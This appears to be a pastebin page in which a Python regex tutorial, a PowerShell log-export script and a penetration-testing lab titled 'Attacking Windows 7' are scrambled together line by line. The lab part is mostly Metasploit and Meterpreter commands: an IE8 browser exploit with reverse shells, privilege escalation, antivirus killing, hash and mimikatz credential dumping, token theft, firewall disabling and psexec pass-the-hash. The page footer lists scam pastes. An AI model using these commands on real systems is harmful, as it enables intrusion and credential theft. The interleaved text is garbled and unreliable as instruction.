Get-EventLog -LogName $LogName | Export-Clixml C:\Users\SecureNinja\Desktop\Scripts\$LogName.xml
\d	        Matches with digits [0-9] and /D (upper case D) matches with non-digits.
\s	        Matches with a single white space character (space, newline, return, tab, form) and \S (upper case S) matches any non-white space character.
\b	        boundary between word and non-word and /B is opposite of /b
[..]	        Matches any single character in a square bracket and [^..] matches any single character not in square bracket
------------------------------------------------------------------------------------------------
\	        It is used for special meaning characters like \. to match a period or \+ for plus sign.
--- Now run the script ---
^ and $	        ^ and $ match the start or end of the string respectively
{n,m}	        Matches at least n and at most m occurrences of preceding expression if we write it as {,m} then it will return at least any minimum occurrence to max m preceding expression.
.\GrabLogs.ps1 
a| b	        Matches either a or b
( )	        Groups regular expressions and returns matched text
\t, \n, \r	Matches tab, newline, return


For more details on  meta characters "(", ")","|" and others details , you can refer this link (https://docs.python.org/2/library/re.html).
------------------------------------------------------------------------------------------------

[CmdletBinding()]
Now, let's understand the pattern operators by looking at the below examples.
param(

    [Parameter(Mandatory=$True)]

    $LogName

****************************************
Get-EventLog -LogName $LogName | Export-Clixml C:\Users\SecureNinja\Desktop\Scripts\$LogName.xml
* Some Examples of Regular Expressions *
****************************************

******************************************************
* Problem 1: Return the first word of a given string *
******************************************************
------------------------------------------------------------------------------------------------

<#

Solution-1  Extract each character (using "\w")
.Synopsis
---------------------------------------------------------------------------
This is a just a short explantion of the script

Code
.Description

This is where provide a more information about how to use the script
import re
result=re.findall(r'.','Python is the best scripting language')
.Parameter LogName
print result
This is where you specify the names of different logs

Output:
./Syntax
['P', 'y', 't', 'h', 'o', 'n', ' ', 'i', 's', ' ', 't', 'h', 'e', ' ', 'b', 'e', 's', 't', ' ', 's', 'c', 'r', 'i', 'p', 't', 'i', 'n', 'g', ' ', 'l', 'a', 'n', 'g', 'u', 'a', 'g', 'e']
GrabLogs.psl -LogName security


Above, space is also extracted, now to avoid it use "\w" instead of ".".
.Example

GrabLogs.psl -LogName security

Code

#>
result=re.findall(r'\w','Python is the best scripting language')
[CmdletBinding()]
print result
param(

    [Parameter(Mandatory=$True)]
Output:
    $LogName
['P', 'y', 't', 'h', 'o', 'n', 'i', 's', 't', 'h', 'e', 'b', 'e', 's', 't', 's', 'c', 'r', 'i', 'p', 't', 'i', 'n', 'g', 'l', 'a', 'n', 'g', 'u', 'a', 'g', 'e']

Get-EventLog -LogName $LogName | Export-Clixml C:\Users\SecureNinja\Desktop\Scripts\$LogName.xml



Solution-2  Extract each word (using "*" or "+")
---------------------------------------------------------------------------
------------------------------------------------------------------------------------------------

--- Now get help on the script ---
Code

get-help .\GrabLogs.ps1
result=re.findall(r'\w*','Python is the best scripting language')
print result

Output:
['Python', '', 'is', '', 'the', '', 'best', '', 'scripting', '', 'language', '']
 

------------------------------------------------------------------------------------------------
Again, it is returning space as a word because "*" returns zero or more matches of pattern to its left. Now to remove spaces we will go with "+".
--- Now get help on the script ---

get-help .\GrabLogs.ps1 -full
Code

result=re.findall(r'\w+','Python is the best scripting language')
print result
Output:
['Python', 'is', 'the', 'best', 'scripting', 'language']


<#


.Synopsis

This is a just a short explantion of the script
Solution-3 Extract each word (using "^")
-------------------------------------------------------------------------------------
.Description

This is where provide a more information about how to use the script

Code
.Parameter LogName

This is where you specify the names of different logs
result=re.findall(r'^\w+','Python is the best scripting language')
print result
./Syntax

GrabLogs.psl -LogName security
Output:
['Python']

.Example
If we will use "$" instead of "^", it will return the word from the end of the string. Let's look at it.
GrabLogs.psl -LogName security

Code

#>
result=re.findall(r'\w+$','Python is the best scripting language')
function Get-GrabLogs{
print result
    [CmdletBinding()]
Output:
    param(
[‘language']
        [Parameter(Mandatory=$True)]

        $LogName

    )

    Get-EventLog -LogName $LogName | Export-Clixml C:\Users\SecureNinja\Desktop\Scripts\$LogName.xml

}

********************************************************** 
* Problem 2: Return the first two character of each word *
# Attacking Windows 7 #
**********************************************************

NOTE: You'll be using your Ubuntu Linux host as the attacker machine in this lab

------------------------Type This------------------------------

sudo /sbin/iptables -F

	infosecaddicts
Solution-1  Extract consecutive two characters of each word, excluding spaces (using "\w")
------------------------------------------------------------------------------------------------------
cd ~/toolz/metasploit

Code
./msfconsole

result=re.findall(r'\w\w','Python is the best')
use exploit/windows/browser/ie_cgenericelement_uaf
print result

set ExitOnSession false
Output:
['Py', 'th', 'on', 'is,', 'th', 'eb', 'es']
set URIPATH /ie8


set PAYLOAD windows/meterpreter/reverse_tcp


set LHOST InfoSecAddictsVM                                            


exploit -j
Solution-2  Extract consecutive two characters those available at start of word boundary (using "\b")
--------------------------------------------------------------- 
------------------------------------------------------------------------------------------------------

- Now from the Win7 host, use Internet Explorer 8 to connect to the exploit address (local address)
Code
- given to you by metasploit.

result=re.findall(r'\b\w.','Python is the best')
- The address will be something like:
print result

http://infosecaddicts-VM-IP:8080/ie8                                            
Output:
['Py', 'is,', 'th', 'be']


- This will simulate a victim clicking on your malicious link and being exploited with a browser exploit.



###########################

# Client-Side Enumeration #
********************************************************
###########################
* Problem 3: Return the domain type of given email-ids *
********************************************************

- You can list the active sessions by typing:

------------------------Type This------------------------------ 
To explain it in simple manner, I will again go with a stepwise approach:
sessions -l





- You can "interact" with any active session by typing sessions -i 3 (replace 3 with the session number you want to interact with)
Solution-1  Extract all characters after "@"
------------------------------------------------------------------------------------------------------------------
------------------------Type This------------------------------ 

sessions -i 1
Code

result=re.findall(r'@\w+','abc.test@gmail.com, xyz@test.com, test.first@strategicsec.com, first.test@rest.biz') 
print result 

Output: ['@gmail', '@test', '@strategicsec', '@rest']
- You should now see Metasploit's meterpreter prompt.



********************************** Figure out who and where you are **********************************
Above, you can see that ".com", ".biz" part is not extracted. To add it, we will go with below code.

meterpreter> sysinfo

result=re.findall(r'@\w+.\w+','abc.test@gmail.com, xyz@test.com, test.first@strategicsec.com, first.test@rest.biz')
print result
meterpreter> getuid

Output:
['@gmail.com', '@test.com', '@strategicsec.com', '@rest.biz']
meterpreter> ipconfig



meterpreter> run post/windows/gather/checkvm



meterpreter> run get_local_subnets
Solution – 2 Extract only domain name using "( )"
-----------------------------------------------------------------------------------------------------------------------


********************************** Escalate privileges and get hashes **********************************
Code

result=re.findall(r'@\w+.(\w+)','abc.test@gmail.com, xyz@test.com, test.first@strategicsec.com, first.test@rest.biz')
meterpreter> use priv
print result

Output:
--Option 1: GetSystem
['com', 'com', 'com', 'biz']
meterpreter> getsystem


--Option 2:

meterpreter > run post/windows/escalate/getsystem


--Option 3:

meterpreter> background
********************************************
back
* Problem 4: Return date from given string *
use post/windows/escalate/droplnk
********************************************
set SESSION 1

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST infosecaddicts-VM-IP                                            
Here we will use "\d" to extract digit.
set LPORT 1234

exploit

Solution:
--Option 4:
----------------------------------------------------------------------------------------------------------------------
use exploit/windows/local/bypassuac

set SESSION 1
Code
set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST infosecaddicts-VM-IP                                            
result=re.findall(r'\d{2}-\d{2}-\d{4}','Joe 34-3456 12-05-2007, XYZ 56-4532 11-11-2016, ABC 67-8945 12-01-2009')
set LPORT 12345
print result
exploit

Output:
--Option 5:
['12-05-2007', '11-11-2016', '12-01-2009']
use exploit/windows/local/service_permissions

set SESSION 1
If you want to extract only year again parenthesis "( )" will help you.
set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST infosecaddicts-VM-IP                                            

set LPORT 5555
Code
exploit


--Option 6:
result=re.findall(r'\d{2}-\d{2}-(\d{4})','Joe 34-3456 12-05-2007, XYZ 56-4532 11-11-2016, ABC 67-8945 12-01-2009')
use exploit/windows/local/trusted_service_path
print result
set SESSION 1

set PAYLOAD windows/meterpreter/reverse_tcp
Output:
set LHOST infosecaddicts-VM-IP                                            
['2007', '2016', '2009']
set LPORT 4567

exploit



--Option 7:

use exploit/windows/local/ppr_flatten_rec
*******************************************************************
set SESSION 1
* Problem 5: Return all words of a string those starts with vowel *
set PAYLOAD windows/meterpreter/reverse_tcp
*******************************************************************
set LHOST infosecaddicts-VM-IP                                            

set LPORT 7777

exploit


--Option 8:
Solution-1  Return each words
use exploit/windows/local/ms_ndproxy
-----------------------------------------------------------------------------------------------------------------
set SESSION 1

set PAYLOAD windows/meterpreter/reverse_tcp
Code
set LHOST infosecaddicts-VM-IP                                            

set LPORT 7788
result=re.findall(r'\w+','Python is the best')
exploit
print result

Output:
--Option 9:
['Python', 'is', 'the', 'best']
use exploit/windows/local/ask

set SESSION 1

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST infosecaddicts-VM-IP                                            

set LPORT 7799

exploit
Solution-2  Return words starts with alphabets (using [])
------------------------------------------------------------------------------------------------------------------

meterpreter > getuid
Code
Server username: win7-64-victim\Workshop

result=re.findall(r'[aeiouAEIOU]\w+','I love Python')
meterpreter > getsystem
print result
...got system (via technique 1).

Output:
['I', 'ove', 'on']
meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM
Above you can see that it has returned "ove" and "on" from the mid of words. To drop these two, we need to use "\b" for word boundary.

--------------------------------------------------------



meterpreter > ps                (search for a process running as NT AUTHORITY\SYSTEM)

Solution- 3
meterpreter > migrate 2800      (your process id WILL NOT be 2800, but make sure you use one that is running at NT AUTHORITY\SYSTEM)
------------------------------------------------------------------------------------------------------------------

meterpreter> run killav
Code

meterpreter> run post/windows/gather/hashdump
result=re.findall(r'\b[aeiouAEIOU]\w+','I love Python')
print result 
meterpreter> run post/windows/gather/credentials/credential_collector

Output:
['I']
********************************** Steal Tokens **********************************


meterpreter > getsystem
In similar ways, we can extract words those starts with constant using "^" within square bracket.

meterpreter > use incognito

Code
meterpreter > list_tokens -u

result=re.findall(r'\b[^aeiouAEIOU]\w+','I love Python')
meterpreter > list_tokens -g
print result

meterpreter > impersonate_token                         <-- choose who you want to impersonate but be sure to use 2 slashes in the name (ex: impersonate_token domain\\user)
Output:
[' love', ' Python']
meterpreter> getuid

Above you can see that it has returned words starting with space. To drop it from output, include space in square bracket[].

************ Stealing credentials and certificates ************

- NOTE: Most of the stuff after 'kerberos' DOES NOT work, but is given here so you know the correct syntax to use when connected to AD or dealing with smart/CAC cards.
Code

meterpreter > getsystem
result=re.findall(r'\b[^aeiouAEIOU ]\w+','I love Python')
print result
meterpreter > load mimikatz

Output:
meterpreter > kerberos
['love', 'Python']

meterpreter > mimikatz_command -f sekurlsa::logonPasswords -a "full"


meterpreter > msv                                                               <-- Your AD password


meterpreter > livessp                                                           <-- Your Windows8 password

*************************************************************************************************
meterpreter > ssp                                                               <-- Your outlook password
* Problem 6: Validate a phone number (phone number must be of 10 digits and starts with 8 or 9) *
*************************************************************************************************
meterpreter > tspkg                                                             <-- Your AD password


meterpreter > wdigest                                                           <-- Your AD password
We have a list phone numbers in list "li" and here we will validate phone numbers using regular

meterpreter > mimikatz_command -f crypto::listStores


meterpreter > mimikatz_command -f crypto::listCertificates

Solution
meterpreter > mimikatz_command -f crypto::exportCertificates CERT_SYSTEM_STORE_CURRENT_USER
-------------------------------------------------------------------------------------------------------------------------------------

meterpreter > mimikatz_command -f crypto::patchcapi

Code
meterpreter> search -d <directory> -f <file-pattern>

import re
li=['9999999999','999999-999','99999x9999']
********************************** Enumerate the host you are on **********************************
for val in li:
 if re.match(r'[8-9]{1}[0-9]{9}',val) and len(val) == 10:
meterpreter > run getcountermeasure
     print 'yes'
 else:
meterpreter> run winenum
     print 'no'

meterpreter > run post/windows/gather/enum_applications

Output:
meterpreter > run post/windows/gather/enum_logged_on_users
yes
no
meterpreter > run post/windows/gather/usb_history
no

meterpreter > run post/windows/gather/enum_shares


meterpreter > run post/windows/gather/enum_snmp


meterpreter> reg enumkey -k HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
******************************************************
* Problem 7: Split a string with multiple delimiters *
******************************************************
********************************** FIX PSEXEC **********************************


- We use the shell command to get to the Victim Dos command so we can add a registry field.

------------------------Type This------------------------------ 
Solution
meterpreter > execute -c -H -f cmd -a "/k" -i
---------------------------------------------------------------------------------------------------------------------------
reg /?


Code
- Created a registry field to the Victim computer, this will allow us to access the machine using and exploit via PSEXEC.

------------------------Type This------------------------------ 
import re
C:\Windows\system32> reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system  /v LocalAccountTokenFilterPolicy  /t REG_DWORD  /d  1
line = 'asdf fjdk;afed,fjek,asdf,foo' # String has multiple delimiters (";",","," ").
result= re.split(r'[;,\s]', line)
print result
c:\Windows\system32> netsh advfirewall set allprofiles state off

Output:
********************************** Lateral Movement *******************************
['asdf', 'fjdk', 'afed', 'fjek', 'asdf', 'foo']


Now we can run the PSEXEC exploit.

-- Option 1:
We can also use method re.sub() to replace these multiple delimiters with one as space " ".
use exploit/windows/smb/psexec


set SMBUser Workshop
Code

set SMBPass password
import re
line = 'asdf fjdk;afed,fjek,asdf,foo'
set RHOST Win7-VM-IP
result= re.sub(r'[;,\s]',' ', line)
print result
set payload windows/meterpreter/reverse_tcp

Output:
set LHOST infosecaddicts-VM-IP
asdf fjdk afed fjek asdf foo

set LPORT 2345


exploit

**************************************************
* Problem 8: Retrieve Information from HTML file *
**************************************************

-- Option 2:

use exploit/windows/smb/psexec

I want to extract information from a HTML file (see below sample data). Here we need to extract information available between <td> and </td> except the first numerical index. I have assumed here that below html code is stored in a string str.
set SMBUser Workshop


set SMBPass aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c

Sample HTML file (str)
set payload windows/meterpreter/reverse_tcp

<tr align="center"><td>1</td> <td>Noah</td> <td>Emma</td></tr>
set RHOST Win7-VM-IP                      
<tr align="center"><td>2</td> <td>Liam</td> <td>Olivia</td></tr>
<tr align="center"><td>3</td> <td>Mason</td> <td>Sophia</td></tr>
set LHOST infosecaddicts-VM-IP
<tr align="center"><td>4</td> <td>Jacob</td> <td>Isabella</td></tr>
<tr align="center"><td>5</td> <td>William</td> <td>Ava</td></tr>
set LPORT 5678
<tr align="center"><td>6</td> <td>Ethan</td> <td>Mia</td></tr>
<tr align="center"><td>7</td> <td HTML>Michael</td> <td>Emily</td></tr>
exploit
Solution:
####################################################

# Running Powershell From A Command Prompt         #

# Using Powersploit & Nishang			           #

####################################################
Code

COMMAND & 1 PARAMATER SYNTAX:		
result=re.findall(r'<td>\w+</td>\s<td>(\w+)</td>\s<td>(\w+)</td>',str)
	powershell -command "& {&'some-command' someParam}"
print result

Output:
[('Noah', 'Emma'), ('Liam', 'Olivia'), ('Mason', 'Sophia'), ('Jacob', 'Isabella'), ('William', 'Ava'), ('Ethan', 'Mia'), ('Michael', 'Emily')]
MULTIPLE COMMAND & PARAMETER SYNTAX

	powershell -command "& {&'some-command' someParam}"; "& {&'some-command' -SpecificArg someParam}"


You can read html file using library urllib2 (see below code).

Tools to download to the web root (/var/www) of your infosecaddicts-Ubuntu-VM:

git clone https://github.com/mattifestation/PowerSploit.git
Code
git clone https://github.com/samratashok/nishang

import urllib2
from the infosecaddicts home dir copy nc.exe to /var/www/ folder
response = urllib2.urlopen('')
html = response.read()

Public Pastes

⭐ Binance Account hack 3B
JavaScript | 11 sec ago | 0.17 KB
⭐ Binance Account hack QK
JavaScript | 7 min ago | 0.17 KB
⭐ get any gift card for FREE⭐ 2I
JavaScript | 8 min ago | 0.17 KB
⭐ get any gift card for AF
JavaScript | 16 min ago | 0.17 KB
⭐️ EARN $500 INSTANTLY KE
JavaScript | 17 min ago | 0.17 KB
⭐️ EARN $500 INSTANTLY⭐ NB
JavaScript | 24 min ago | 0.17 KB
⭐ FREE giftcards method⭐ TO
JavaScript | 25 min ago | 0.17 KB
⭐ FREE giftcards method ON
JavaScript | 33 min ago | 0.17 KB